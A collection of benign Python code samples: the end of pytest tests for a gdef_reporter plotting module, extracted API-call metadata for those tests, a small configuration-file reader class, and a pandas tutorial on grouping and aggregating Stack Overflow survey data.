fig1, ax1 = plt.subplots(1, 1, dpi=ORIGINAL_DPI, figsize=ORIGINAL_FIGURE_SIZE, constrained_layout=True)
pixel_width = None
if isinstance(multiple_data_test_cases, dict):
pixel_width = 0.5e-6
plot_z_histogram_to_ax(ax1, multiple_data_test_cases, pixel_width=pixel_width, title="", add_norm=True)
auto_show(fig1)
assert isinstance(fig1, Figure)
assert len(fig1.axes[0].containers) == len(multiple_data_test_cases)
assert len(fig1.axes[0].lines) == len(multiple_data_test_cases) # Gauss fits (add_norm=True)
def test_create_z_histogram_plot__defaults(self, data_test_cases):
# check setting figure_size and dpi and also default of parameters title, n_bins, units and add_norm
fig1 = create_z_histogram_plot(data_test_cases)
auto_show(fig1)
assert type(fig1) is Figure
assert len(fig1.axes[0].lines) == 0 # no Gauss fit (expected default behaviour)
assert fig1.axes[0].get_title().startswith("\u03BC=") # default title starts with mu=...
assert fig1.axes[0].get_xlabel() == "z [\u03BCm]" # default units should be µm; note: µ == \u03BC is False!
assert len(fig1.axes[0].containers[0]) == 200 # default n_bins should be 200
def test_create_z_histogram_plot__set_paramaters(self, data_test_cases):
# first, check setting label, a title, selecting units µm, set n_bins and draw normal distribution fit
labels = type(data_test_cases).__name__
title = "Use [nm] and Gauss fit"
n_bins = 20
plotter_style = get_plotter_style_histogram(ORIGINAL_DPI, ORIGINAL_FIGURE_SIZE)
fig1 = create_z_histogram_plot(data_test_cases, labels, n_bins=n_bins, title=title, units="nm", add_norm=True,
plotter_style=plotter_style)
auto_show(fig1)
assert len(fig1.axes[0].lines) == 1 # Gauss fit (add_norm=True)
assert np.any(fig1.get_size_inches() == ORIGINAL_FIGURE_SIZE)
assert fig1.dpi == ORIGINAL_DPI
assert fig1._suptitle.get_text() == title
assert fig1.axes[0].get_title() == ""
assert str(fig1.axes[0].get_xlabel()) == str(f"z [nm]") # note: comparison between µ and \u03BC is False!
assert len(fig1.axes[0].containers[0]) == n_bins # default n_bins should be 200
# second, check no title via title=None
fig2 = create_z_histogram_plot(data_test_cases, title=None)
auto_show(fig2)
assert fig2._suptitle is None
assert fig2.axes[0].get_title() == ""
def test_create_z_histogram_plot__multiple(self, multiple_data_test_cases):
labels = None
pixel_width = 0.5e-6
if isinstance(multiple_data_test_cases, list):
labels = []
for i, data in enumerate(multiple_data_test_cases):
labels.append(f"{i} - {type(data).__name__}")
fig1 = create_z_histogram_plot(multiple_data_test_cases, pixel_width=pixel_width, labels=labels, title="",
add_norm=True)
auto_show(fig1)
assert len(fig1.axes[0].containers) == len(multiple_data_test_cases)
assert len(fig1.axes[0].lines) == len(multiple_data_test_cases) # Gauss fits (add_norm=True)
class Test1DPlotRMS:
def test_plot_rms_to_ax(self):
pass
def test_create_rms_plot__default(self, data_test_cases):
fig = create_rms_plot(data_test_cases)
assert isinstance(fig, Figure)
if isinstance(data_test_cases, np.ndarray):
assert fig.axes[0].get_xlabel() == "x [px]"
else:
assert fig.axes[0].get_xlabel() == "x [\u03BCm]"
assert fig.axes[0].legend_ is None
auto_show(fig)
def test_create_rms_plot__set_parameters(self, data_test_cases):
pixel_width = 0.5e-9 # define a length scale for np.ndarray
labels = f"{type(data_test_cases).__name__}"
fig = create_rms_plot(data_test_cases, label_list=labels, pixel_width=pixel_width, moving_average_n=1,
subtract_average=True, x_units="nm")
assert isinstance(fig, Figure)
assert fig.axes[0].get_xlabel() == "x [nm]"
assert fig.axes[0].legend_ is not None
auto_show(fig)
def test_create_rms_plot__multiple_default(self, multiple_data_test_cases):
if isinstance(multiple_data_test_cases, dict):
if (_list := len([data for data in multiple_data_test_cases.values() if isinstance(data, np.ndarray)]) > 0)\
and _list < len(multiple_data_test_cases):
with pytest.raises(AssertionError):
create_rms_plot(multiple_data_test_cases)
return
fig = create_rms_plot(multiple_data_test_cases)
assert len(multiple_data_test_cases) == len(fig.axes[0].lines)
auto_show(fig)
def test_create_rms_plot__multiple_set_parameter(self, multiple_data_test_cases):
labels = None
pixel_width = 0.5e-6
title = type(multiple_data_test_cases).__name__
if isinstance(multiple_data_test_cases, list):
labels = [f"{type(data).__name__}" for data in multiple_data_test_cases]
fig = create_rms_plot(multiple_data_test_cases, label_list=labels, pixel_width=pixel_width, moving_average_n=1,
subtract_average=False, x_units="nm", title=title)
assert fig.axes[0].legend_ is not None or len(multiple_data_test_cases) == 0
assert len(multiple_data_test_cases) == len(fig.axes[0].lines)
assert fig.axes[0].get_xlabel() == "x [nm]"
auto_show(fig)
class Test1DPlotRMSWithError:
def test_create_rms_with_error_plot(self, data_test_cases):
fig = create_rms_with_error_plot(data_test_cases)
if isinstance(data_test_cases, np.ndarray):
assert fig.axes[0].get_xlabel() == "x [px]"
else:
assert fig.axes[0].get_xlabel() == "x [\u03BCm]"
auto_show(fig)
def test_create_rms_with_error_plot__multiple(self, multiple_data_test_cases):
pixel_width = None
if isinstance(multiple_data_test_cases, dict):
if (_list := len([data for data in multiple_data_test_cases.values() if isinstance(data, np.ndarray)]) > 0)\
and _list < len(multiple_data_test_cases):
with pytest.raises(AssertionError):
create_rms_with_error_plot(multiple_data_test_cases)
pixel_width = 0.5e-6 # setting a pixel_width, np.ndarray has a length scale -> no AssertionError
fig = create_rms_with_error_plot(multiple_data_test_cases, pixel_width=pixel_width)
assert fig.axes[0].get_xlabel() == "x [\u03BCm]"
auto_show(fig)
class TestSummaryPlot:
def test_create_summary_plot(self, multiple_data_test_cases):
pixel_width = 0.5e-6
title = f"{type(multiple_data_test_cases).__name__}"
fig = create_summary_plot(multiple_data_test_cases, pixel_width=pixel_width, title=title)
assert isinstance(fig, Figure)
auto_show(fig)
class TestSpecialFunctions:
def test_extract_ndarray_and_pixel_width(self, data_test_cases):
pixel_width = 1
ndarray2d, px_width = _extract_ndarray_and_pixel_width(data_test_cases, pixel_width=pixel_width)
assert type(ndarray2d) is np.ndarray
if isinstance(data_test_cases, np.ndarray):
assert np.all(data_test_cases == ndarray2d)
assert px_width == pixel_width
else:
assert np.all(data_test_cases.values == ndarray2d)
assert data_test_cases.pixel_width == px_width
def test_save_figure(self, tmp_path):
fig, _ = plt.subplots(1, 1, dpi=72, figsize=(1, 1), constrained_layout=True)
# first try saving in existing folder with default settings
assert tmp_path.exists()
filename = "default"
save_figure(fig, tmp_path, filename)
png_file = tmp_path / f"{filename}.png" # should be saved by default
pdf_file = tmp_path / f"{filename}.pdf" # should not be saved by default
assert png_file.exists()
assert not pdf_file.exists()
# second, save nothing:
filename = "save_nothing"
save_figure(fig, tmp_path, filename, png=False, pdf=False)
png_file = tmp_path / f"{filename}.png" # should be saved by default
pdf_file = tmp_path / f"{filename}.pdf" # should not be saved by default
assert not png_file.exists()
assert not pdf_file.exists()
# third, only save pdf
filename = "save_pdf"
save_figure(fig, tmp_path, filename, png=False, pdf=True)
png_file = tmp_path / f"{filename}.png" # should be saved by default
pdf_file = tmp_path / f"{filename}.pdf" # should not be saved by default
assert not png_file.exists()
assert pdf_file.exists()
# fourth, use folder that does not exist jet and save both png and pdf
new_tmp_path = tmp_path / "new/"
assert not new_tmp_path.exists()
filename = "save_pdf_and_png"
save_figure(fig, new_tmp_path, filename, png=True, pdf=True)
png_file = new_tmp_path / f"{filename}.png" # should be saved by default
pdf_file = new_tmp_path / f"{filename}.pdf" # should not be saved by default
assert png_file.exists()
assert pdf_file.exists()
| [
"gdef_reporter.plotter_utils.save_figure",
"gdef_reporter.plotter_utils.create_summary_plot",
"gdef_reporter.plotter_styles.get_plotter_style_histogram",
"gdef_reporter.plotter_utils.create_z_histogram_plot",
"gdef_reporter.plotter_utils.create_rms_plot",
"gdef_reporter.plotter_utils.plot_to_ax",
"gdef_... | [((759, 825), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(1)', '(1)'], {'dpi': 'ORIGINAL_DPI', 'figsize': 'ORIGINAL_FIGURE_SIZE'}), '(1, 1, dpi=ORIGINAL_DPI, figsize=ORIGINAL_FIGURE_SIZE)\n', (771, 825), True, 'import matplotlib.pyplot as plt\n'), ((834, 883), 'gdef_reporter.plotter_utils.plot_to_ax', 'plot_to_ax', (['ax1', 'data_test_cases'], {'pixel_width': '(1.0)'}), '(ax1, data_test_cases, pixel_width=1.0)\n', (844, 883), False, 'from gdef_reporter.plotter_utils import plot_to_ax, create_plot, plot_z_histogram_to_ax, create_z_histogram_plot, _extract_ndarray_and_pixel_width, save_figure, create_rms_plot, create_rms_with_error_plot, create_summary_plot\n'), ((1055, 1121), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(1)', '(1)'], {'dpi': 'ORIGINAL_DPI', 'figsize': 'ORIGINAL_FIGURE_SIZE'}), '(1, 1, dpi=ORIGINAL_DPI, figsize=ORIGINAL_FIGURE_SIZE)\n', (1067, 1121), True, 'import matplotlib.pyplot as plt\n'), ((1235, 1305), 'gdef_reporter.plotter_utils.plot_to_ax', 'plot_to_ax', (['ax2', 'data_test_cases'], {'pixel_width': 'pixel_width', 'title': 'title'}), '(ax2, data_test_cases, pixel_width=pixel_width, title=title)\n', (1245, 1305), False, 'from gdef_reporter.plotter_utils import plot_to_ax, create_plot, plot_z_histogram_to_ax, create_z_histogram_plot, _extract_ndarray_and_pixel_width, save_figure, create_rms_plot, create_rms_with_error_plot, create_summary_plot\n'), ((1391, 1457), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(1)', '(1)'], {'dpi': 'ORIGINAL_DPI', 'figsize': 'ORIGINAL_FIGURE_SIZE'}), '(1, 1, dpi=ORIGINAL_DPI, figsize=ORIGINAL_FIGURE_SIZE)\n', (1403, 1457), True, 'import matplotlib.pyplot as plt\n'), ((1576, 1651), 'gdef_reporter.plotter_utils.plot_to_ax', 'plot_to_ax', (['ax3', 'data_test_cases'], {'pixel_width': '(5.0)', 'z_unit': '"""µm"""', 'title': 'title'}), "(ax3, data_test_cases, pixel_width=5.0, z_unit='µm', title=title)\n", (1586, 1651), False, 'from gdef_reporter.plotter_utils import plot_to_ax, create_plot, plot_z_histogram_to_ax, create_z_histogram_plot, _extract_ndarray_and_pixel_width, save_figure, create_rms_plot, create_rms_with_error_plot, create_summary_plot\n'), ((1794, 1905), 'gdef_reporter.plotter_utils.create_plot', 'create_plot', (['data_test_cases', '(1e-06)', '"""default value for cropped (True)"""', 'ORIGINAL_FIGURE_SIZE', 'ORIGINAL_DPI'], {}), "(data_test_cases, 1e-06, 'default value for cropped (True)',\n ORIGINAL_FIGURE_SIZE, ORIGINAL_DPI)\n", (1805, 1905), False, 'from gdef_reporter.plotter_utils import plot_to_ax, create_plot, plot_z_histogram_to_ax, create_z_histogram_plot, _extract_ndarray_and_pixel_width, save_figure, create_rms_plot, create_rms_with_error_plot, create_summary_plot\n'), ((2120, 2230), 'gdef_reporter.plotter_utils.create_plot', 'create_plot', (['data_test_cases', '(1e-06)', '"""cropped=False"""'], {'max_figure_size': 'ORIGINAL_FIGURE_SIZE', 'cropped': '(False)'}), "(data_test_cases, 1e-06, 'cropped=False', max_figure_size=\n ORIGINAL_FIGURE_SIZE, cropped=False)\n", (2131, 2230), False, 'from gdef_reporter.plotter_utils import plot_to_ax, create_plot, plot_z_histogram_to_ax, create_z_histogram_plot, _extract_ndarray_and_pixel_width, save_figure, create_rms_plot, create_rms_with_error_plot, create_summary_plot\n'), ((2530, 2625), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(1)', '(1)'], {'dpi': 'ORIGINAL_DPI', 'figsize': 'ORIGINAL_FIGURE_SIZE', 'constrained_layout': '(True)'}), '(1, 1, dpi=ORIGINAL_DPI, figsize=ORIGINAL_FIGURE_SIZE,\n constrained_layout=True)\n', (2542, 2625), True, 'import matplotlib.pyplot as plt\n'), ((2630, 2684), 'gdef_reporter.plotter_utils.plot_z_histogram_to_ax', 'plot_z_histogram_to_ax', (['ax1', 'data_test_cases'], {'title': '""""""'}), "(ax1, data_test_cases, title='')\n", (2652, 2684), False, 'from gdef_reporter.plotter_utils import plot_to_ax, create_plot, plot_z_histogram_to_ax, create_z_histogram_plot, _extract_ndarray_and_pixel_width, save_figure, create_rms_plot, create_rms_with_error_plot, create_summary_plot\n'), ((3264, 3359), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(1)', '(1)'], {'dpi': 'ORIGINAL_DPI', 'figsize': 'ORIGINAL_FIGURE_SIZE', 'constrained_layout': '(True)'}), '(1, 1, dpi=ORIGINAL_DPI, figsize=ORIGINAL_FIGURE_SIZE,\n constrained_layout=True)\n', (3276, 3359), True, 'import matplotlib.pyplot as plt\n'), ((3754, 3817), 'gdef_reporter.plotter_utils.plot_z_histogram_to_ax', 'plot_z_histogram_to_ax', (['ax1', 'multiple_data_test_cases'], {'title': '""""""'}), "(ax1, multiple_data_test_cases, title='')\n", (3776, 3817), False, 'from gdef_reporter.plotter_utils import plot_to_ax, create_plot, plot_z_histogram_to_ax, create_z_histogram_plot, _extract_ndarray_and_pixel_width, save_figure, create_rms_plot, create_rms_with_error_plot, create_summary_plot\n'), ((4618, 4713), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(1)', '(1)'], {'dpi': 'ORIGINAL_DPI', 'figsize': 'ORIGINAL_FIGURE_SIZE', 'constrained_layout': '(True)'}), '(1, 1, dpi=ORIGINAL_DPI, figsize=ORIGINAL_FIGURE_SIZE,\n constrained_layout=True)\n', (4630, 4713), True, 'import matplotlib.pyplot as plt\n'), ((4779, 4882), 'gdef_reporter.plotter_utils.plot_z_histogram_to_ax', 'plot_z_histogram_to_ax', (['ax1', 'data_test_cases'], {'n_bins': 'n_bins', 'units': '"""nm"""', 'title': 'title', 'add_norm': '(True)'}), "(ax1, data_test_cases, n_bins=n_bins, units='nm',\n title=title, add_norm=True)\n", (4801, 4882), False, 'from gdef_reporter.plotter_utils import plot_to_ax, create_plot, plot_z_histogram_to_ax, create_z_histogram_plot, _extract_ndarray_and_pixel_width, save_figure, create_rms_plot, create_rms_with_error_plot, create_summary_plot\n'), ((5262, 5357), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(1)', '(1)'], {'dpi': 'ORIGINAL_DPI', 'figsize': 'ORIGINAL_FIGURE_SIZE', 'constrained_layout': '(True)'}), '(1, 1, dpi=ORIGINAL_DPI, figsize=ORIGINAL_FIGURE_SIZE,\n constrained_layout=True)\n', (5274, 5357), True, 'import matplotlib.pyplot as plt\n'), ((5383, 5468), 'gdef_reporter.plotter_utils.plot_z_histogram_to_ax', 'plot_z_histogram_to_ax', (['ax2', 'data_test_cases'], {'n_bins': '(20)', 'units': '"""µm"""', 'title': 'title'}), "(ax2, data_test_cases, n_bins=20, units='µm', title=title\n )\n", (5405, 5468), False, 'from gdef_reporter.plotter_utils import plot_to_ax, create_plot, plot_z_histogram_to_ax, create_z_histogram_plot, _extract_ndarray_and_pixel_width, save_figure, create_rms_plot, create_rms_with_error_plot, create_summary_plot\n'), ((5652, 5747), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(1)', '(1)'], {'dpi': 'ORIGINAL_DPI', 'figsize': 'ORIGINAL_FIGURE_SIZE', 'constrained_layout': '(True)'}), '(1, 1, dpi=ORIGINAL_DPI, figsize=ORIGINAL_FIGURE_SIZE,\n constrained_layout=True)\n', (5664, 5747), True, 'import matplotlib.pyplot as plt\n'), ((5868, 5976), 'gdef_reporter.plotter_utils.plot_z_histogram_to_ax', 'plot_z_histogram_to_ax', (['ax1', 'multiple_data_test_cases'], {'pixel_width': 'pixel_width', 'title': '""""""', 'add_norm': '(True)'}), "(ax1, multiple_data_test_cases, pixel_width=\n pixel_width, title='', add_norm=True)\n", (5890, 5976), False, 'from gdef_reporter.plotter_utils import plot_to_ax, create_plot, plot_z_histogram_to_ax, create_z_histogram_plot, _extract_ndarray_and_pixel_width, save_figure, create_rms_plot, create_rms_with_error_plot, create_summary_plot\n'), ((6412, 6452), 'gdef_reporter.plotter_utils.create_z_histogram_plot', 'create_z_histogram_plot', (['data_test_cases'], {}), '(data_test_cases)\n', (6435, 6452), False, 'from gdef_reporter.plotter_utils import plot_to_ax, create_plot, plot_z_histogram_to_ax, create_z_histogram_plot, _extract_ndarray_and_pixel_width, save_figure, create_rms_plot, create_rms_with_error_plot, create_summary_plot\n'), ((7226, 7289), 'gdef_reporter.plotter_styles.get_plotter_style_histogram', 'get_plotter_style_histogram', (['ORIGINAL_DPI', 'ORIGINAL_FIGURE_SIZE'], {}), '(ORIGINAL_DPI, ORIGINAL_FIGURE_SIZE)\n', (7253, 7289), False, 'from gdef_reporter.plotter_styles import get_plotter_style_histogram\n'), ((7305, 7441), 'gdef_reporter.plotter_utils.create_z_histogram_plot', 'create_z_histogram_plot', (['data_test_cases', 'labels'], {'n_bins': 'n_bins', 'title': 'title', 'units': '"""nm"""', 'add_norm': '(True)', 'plotter_style': 'plotter_style'}), "(data_test_cases, labels, n_bins=n_bins, title=title,\n units='nm', add_norm=True, plotter_style=plotter_style)\n", (7328, 7441), False, 'from gdef_reporter.plotter_utils import plot_to_ax, create_plot, plot_z_histogram_to_ax, create_z_histogram_plot, _extract_ndarray_and_pixel_width, save_figure, create_rms_plot, create_rms_with_error_plot, create_summary_plot\n'), ((8048, 8100), 'gdef_reporter.plotter_utils.create_z_histogram_plot', 'create_z_histogram_plot', (['data_test_cases'], {'title': 'None'}), '(data_test_cases, title=None)\n', (8071, 8100), False, 'from gdef_reporter.plotter_utils import plot_to_ax, create_plot, plot_z_histogram_to_ax, create_z_histogram_plot, _extract_ndarray_and_pixel_width, save_figure, create_rms_plot, create_rms_with_error_plot, create_summary_plot\n'), ((8562, 8680), 'gdef_reporter.plotter_utils.create_z_histogram_plot', 'create_z_histogram_plot', (['multiple_data_test_cases'], {'pixel_width': 'pixel_width', 'labels': 'labels', 'title': '""""""', 'add_norm': '(True)'}), "(multiple_data_test_cases, pixel_width=pixel_width,\n labels=labels, title='', add_norm=True)\n", (8585, 8680), False, 'from gdef_reporter.plotter_utils import plot_to_ax, create_plot, plot_z_histogram_to_ax, create_z_histogram_plot, _extract_ndarray_and_pixel_width, save_figure, create_rms_plot, create_rms_with_error_plot, create_summary_plot\n'), ((9067, 9099), 'gdef_reporter.plotter_utils.create_rms_plot', 'create_rms_plot', (['data_test_cases'], {}), '(data_test_cases)\n', (9082, 9099), False, 'from gdef_reporter.plotter_utils import plot_to_ax, create_plot, plot_z_histogram_to_ax, create_z_histogram_plot, _extract_ndarray_and_pixel_width, save_figure, create_rms_plot, create_rms_with_error_plot, create_summary_plot\n'), ((9594, 9731), 'gdef_reporter.plotter_utils.create_rms_plot', 'create_rms_plot', (['data_test_cases'], {'label_list': 'labels', 'pixel_width': 'pixel_width', 'moving_average_n': '(1)', 'subtract_average': '(True)', 'x_units': '"""nm"""'}), "(data_test_cases, label_list=labels, pixel_width=pixel_width,\n moving_average_n=1, subtract_average=True, x_units='nm')\n", (9609, 9731), False, 'from gdef_reporter.plotter_utils import plot_to_ax, create_plot, plot_z_histogram_to_ax, create_z_histogram_plot, _extract_ndarray_and_pixel_width, save_figure, create_rms_plot, create_rms_with_error_plot, create_summary_plot\n'), ((10391, 10432), 'gdef_reporter.plotter_utils.create_rms_plot', 'create_rms_plot', (['multiple_data_test_cases'], {}), '(multiple_data_test_cases)\n', (10406, 10432), False, 'from gdef_reporter.plotter_utils import plot_to_ax, create_plot, plot_z_histogram_to_ax, create_z_histogram_plot, _extract_ndarray_and_pixel_width, save_figure, create_rms_plot, create_rms_with_error_plot, create_summary_plot\n'), ((10875, 11040), 'gdef_reporter.plotter_utils.create_rms_plot', 'create_rms_plot', (['multiple_data_test_cases'], {'label_list': 'labels', 'pixel_width': 'pixel_width', 'moving_average_n': '(1)', 'subtract_average': '(False)', 'x_units': '"""nm"""', 'title': 'title'}), "(multiple_data_test_cases, label_list=labels, pixel_width=\n pixel_width, moving_average_n=1, subtract_average=False, x_units='nm',\n title=title)\n", (10890, 11040), False, 'from gdef_reporter.plotter_utils import plot_to_ax, create_plot, plot_z_histogram_to_ax, create_z_histogram_plot, _extract_ndarray_and_pixel_width, save_figure, create_rms_plot, create_rms_with_error_plot, create_summary_plot\n'), ((11403, 11446), 'gdef_reporter.plotter_utils.create_rms_with_error_plot', 'create_rms_with_error_plot', (['data_test_cases'], {}), '(data_test_cases)\n', (11429, 11446), False, 'from gdef_reporter.plotter_utils import plot_to_ax, create_plot, plot_z_histogram_to_ax, create_z_histogram_plot, _extract_ndarray_and_pixel_width, save_figure, create_rms_plot, create_rms_with_error_plot, create_summary_plot\n'), ((12257, 12334), 'gdef_reporter.plotter_utils.create_rms_with_error_plot', 'create_rms_with_error_plot', (['multiple_data_test_cases'], {'pixel_width': 'pixel_width'}), '(multiple_data_test_cases, pixel_width=pixel_width)\n', (12283, 12334), False, 'from gdef_reporter.plotter_utils import plot_to_ax, create_plot, plot_z_histogram_to_ax, create_z_histogram_plot, _extract_ndarray_and_pixel_width, save_figure, create_rms_plot, create_rms_with_error_plot, create_summary_plot\n'), ((12610, 12697), 'gdef_reporter.plotter_utils.create_summary_plot', 'create_summary_plot', (['multiple_data_test_cases'], {'pixel_width': 'pixel_width', 'title': 'title'}), '(multiple_data_test_cases, pixel_width=pixel_width,\n title=title)\n', (12629, 12697), False, 'from gdef_reporter.plotter_utils import plot_to_ax, create_plot, plot_z_histogram_to_ax, create_z_histogram_plot, _extract_ndarray_and_pixel_width, save_figure, create_rms_plot, create_rms_with_error_plot, create_summary_plot\n'), ((12909, 12983), 'gdef_reporter.plotter_utils._extract_ndarray_and_pixel_width', '_extract_ndarray_and_pixel_width', (['data_test_cases'], {'pixel_width': 'pixel_width'}), '(data_test_cases, pixel_width=pixel_width)\n', (12941, 12983), False, 'from gdef_reporter.plotter_utils import plot_to_ax, create_plot, plot_z_histogram_to_ax, create_z_histogram_plot, _extract_ndarray_and_pixel_width, save_figure, create_rms_plot, create_rms_with_error_plot, create_summary_plot\n'), ((13376, 13443), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(1)', '(1)'], {'dpi': '(72)', 'figsize': '(1, 1)', 'constrained_layout': '(True)'}), '(1, 1, dpi=72, figsize=(1, 1), constrained_layout=True)\n', (13388, 13443), True, 'import matplotlib.pyplot as plt\n'), ((13583, 13619), 'gdef_reporter.plotter_utils.save_figure', 'save_figure', (['fig', 'tmp_path', 'filename'], {}), '(fig, tmp_path, filename)\n', (13594, 13619), False, 'from gdef_reporter.plotter_utils import plot_to_ax, create_plot, plot_z_histogram_to_ax, create_z_histogram_plot, _extract_ndarray_and_pixel_width, save_figure, create_rms_plot, create_rms_with_error_plot, create_summary_plot\n'), ((13925, 13983), 'gdef_reporter.plotter_utils.save_figure', 'save_figure', (['fig', 'tmp_path', 'filename'], {'png': '(False)', 'pdf': '(False)'}), '(fig, tmp_path, filename, png=False, pdf=False)\n', (13936, 13983), False, 'from gdef_reporter.plotter_utils import plot_to_ax, create_plot, plot_z_histogram_to_ax, create_z_histogram_plot, _extract_ndarray_and_pixel_width, save_figure, create_rms_plot, create_rms_with_error_plot, create_summary_plot\n'), ((14288, 14345), 'gdef_reporter.plotter_utils.save_figure', 'save_figure', (['fig', 'tmp_path', 'filename'], {'png': '(False)', 'pdf': '(True)'}), '(fig, tmp_path, filename, png=False, pdf=True)\n', (14299, 14345), False, 'from gdef_reporter.plotter_utils import plot_to_ax, create_plot, plot_z_histogram_to_ax, create_z_histogram_plot, _extract_ndarray_and_pixel_width, save_figure, create_rms_plot, create_rms_with_error_plot, create_summary_plot\n'), ((14784, 14844), 'gdef_reporter.plotter_utils.save_figure', 'save_figure', (['fig', 'new_tmp_path', 'filename'], {'png': '(True)', 'pdf': '(True)'}), '(fig, new_tmp_path, filename, png=True, pdf=True)\n', (14795, 14844), False, 'from gdef_reporter.plotter_utils import plot_to_ax, create_plot, plot_z_histogram_to_ax, create_z_histogram_plot, _extract_ndarray_and_pixel_width, save_figure, create_rms_plot, create_rms_with_error_plot, create_summary_plot\n'), ((13100, 13136), 'numpy.all', 'np.all', (['(data_test_cases == ndarray2d)'], {}), '(data_test_cases == ndarray2d)\n', (13106, 13136), True, 'import numpy as np\n'), ((13213, 13256), 'numpy.all', 'np.all', (['(data_test_cases.values == ndarray2d)'], {}), '(data_test_cases.values == ndarray2d)\n', (13219, 13256), True, 'import numpy as np\n'), ((2045, 2063), 'numpy.all', 'np.all', (['comparison'], {}), '(comparison)\n', (2051, 2063), True, 'import numpy as np\n'), ((3617, 3646), 'pytest.raises', 'pytest.raises', (['AssertionError'], {}), '(AssertionError)\n', (3630, 3646), False, 'import pytest\n'), ((3668, 3721), 'gdef_reporter.plotter_utils.plot_z_histogram_to_ax', 'plot_z_histogram_to_ax', (['ax1', 'multiple_data_test_cases'], {}), '(ax1, multiple_data_test_cases)\n', (3690, 3721), False, 'from gdef_reporter.plotter_utils import plot_to_ax, create_plot, plot_z_histogram_to_ax, create_z_histogram_plot, _extract_ndarray_and_pixel_width, save_figure, create_rms_plot, create_rms_with_error_plot, create_summary_plot\n'), ((10260, 10289), 'pytest.raises', 'pytest.raises', (['AssertionError'], {}), '(AssertionError)\n', (10273, 10289), False, 'import pytest\n'), ((10311, 10352), 'gdef_reporter.plotter_utils.create_rms_plot', 'create_rms_plot', (['multiple_data_test_cases'], {}), '(multiple_data_test_cases)\n', (10326, 10352), False, 'from gdef_reporter.plotter_utils import plot_to_ax, create_plot, plot_z_histogram_to_ax, create_z_histogram_plot, _extract_ndarray_and_pixel_width, save_figure, create_rms_plot, create_rms_with_error_plot, create_summary_plot\n'), ((12024, 12053), 'pytest.raises', 'pytest.raises', (['AssertionError'], {}), '(AssertionError)\n', (12037, 12053), False, 'import pytest\n'), ((12075, 12127), 'gdef_reporter.plotter_utils.create_rms_with_error_plot', 'create_rms_with_error_plot', (['multiple_data_test_cases'], {}), '(multiple_data_test_cases)\n', (12101, 12127), False, 'from gdef_reporter.plotter_utils import plot_to_ax, create_plot, plot_z_histogram_to_ax, create_z_histogram_plot, _extract_ndarray_and_pixel_width, save_figure, create_rms_plot, create_rms_with_error_plot, create_summary_plot\n')] |
import os
import sys
import configparser
class Config:
def __init__(self):
pass
#
# a simple function to read an array of configuration files into a config object
#
def read_config(self, cfg_files):
if(cfg_files != None):
config = configparser.RawConfigParser()
# merges all files into a single config
for i, cfg_file in enumerate(cfg_files):
if(os.path.exists(cfg_file)):
config.read(cfg_file)
if(config == None):
print("####################################")
print("Did not find any configuration files")
print("####################################")
sys.exit(0)
return config
#
# Validate properties
#
def validateProperties(self, config):
env = config.get('branch','env')
# Cannot set both filter_care_sites and include_care_sites
filter_care_sites = config.get(env+'.cohort','filter_care_sites').split(",")
if not filter_care_sites[0]:
filter_care_sites = []
include_care_sites = config.get(env+'.cohort','include_care_sites').split(",")
if not include_care_sites[0]:
include_care_sites = []
if (len(filter_care_sites) > 0 and len(include_care_sites) > 0):
print("###########################################################################")
print("Cannot set both filter_care_sites and include_care_sites in properties file")
print("###########################################################################")
sys.exit(0)
# If the user wants to dump the cohort back out to csv files, make sure the files
# do not already exist
write_csv_output = config.get(env+'.cohort','write_csv_output')
csv_output_dir = config.get(env+'.cohort','csv_output_dir')
if (write_csv_output == "True" and len(os.listdir(csv_output_dir)) > 0):
print("########################################")
print(" Files already exist in output directory")
print("########################################")
sys.exit(0)
| [
"os.path.exists",
"configparser.RawConfigParser",
"os.listdir",
"sys.exit"
] | [((280, 310), 'configparser.RawConfigParser', 'configparser.RawConfigParser', ([], {}), '()\n', (308, 310), False, 'import configparser\n'), ((423, 447), 'os.path.exists', 'os.path.exists', (['cfg_file'], {}), '(cfg_file)\n', (437, 447), False, 'import os\n'), ((702, 713), 'sys.exit', 'sys.exit', (['(0)'], {}), '(0)\n', (710, 713), False, 'import sys\n'), ((1620, 1631), 'sys.exit', 'sys.exit', (['(0)'], {}), '(0)\n', (1628, 1631), False, 'import sys\n'), ((2173, 2184), 'sys.exit', 'sys.exit', (['(0)'], {}), '(0)\n', (2181, 2184), False, 'import sys\n'), ((1941, 1967), 'os.listdir', 'os.listdir', (['csv_output_dir'], {}), '(csv_output_dir)\n', (1951, 1967), False, 'import os\n')] |
# %%
"""
Let's get familiar with Grouping and Aggregating.
Aggregating means combining multiple pieces of data into a single result.
Mean, median or the mod are aggregating functions.
"""
import pandas as pd
# %%
df = pd.read_csv(
"developer_survey_2019/survey_results_public.csv", index_col="Respondent")
schema_df = pd.read_csv(
"developer_survey_2019/survey_results_schema.csv", index_col="Column")
# %%
pd.set_option('display.max_columns', 85)
pd.set_option('display.max_rows', 85)
# %%
df.head()
# %%
"""In this column NaN means they ignore this question
and don't answer to that."""
df["ConvertedComp"].head(15)
# %%
df["ConvertedComp"].median()
# %%
df.median()
# %%
"""df.describe() gives us count, mean, std, min, max and
some quantiles(25%, 50%, 75%)."""
df.describe()
# %%
df["ConvertedComp"].count()
# %%
df["Hobbyist"]
# %%
df["Hobbyist"].value_counts()
# %%
df["SocialMedia"]
# %%
schema_df.loc["SocialMedia"]
# %%
df["SocialMedia"].value_counts()
# %%
"""Percentage form"""
df["SocialMedia"].value_counts(normalize=True)
# %%
"""
grouping our data:
A group by operation involves some combination of splitting up
our object applying a function and then combining those results
1_Splitting
2_Apply function
3_Combining the results
"""
df["Country"]
# %%
df["Country"].value_counts()
# %%
df.groupby(["Country"])
# %%
country_grp = df.groupby(["Country"])
# %%
country_grp.get_group("United States")
# %%
"""Finding the most popular socialmedia in each country"""
filt = df["Country"] == "United States"
df.loc[filt]["SocialMedia"].value_counts()
# %%
country_grp["SocialMedia"].value_counts()
# %%
country_grp["SocialMedia"].value_counts().head(50)
# %%
"""country_grp method is better than filt way to doing this.
Because we don't need reload filter over and over."""
country_grp["SocialMedia"].value_counts().loc["United States"]
# %%
country_grp["ConvertedComp"].median()
# %%
country_grp["ConvertedComp"].median().loc["Germany"]
# %%
"""agg: Aggregating Methods"""
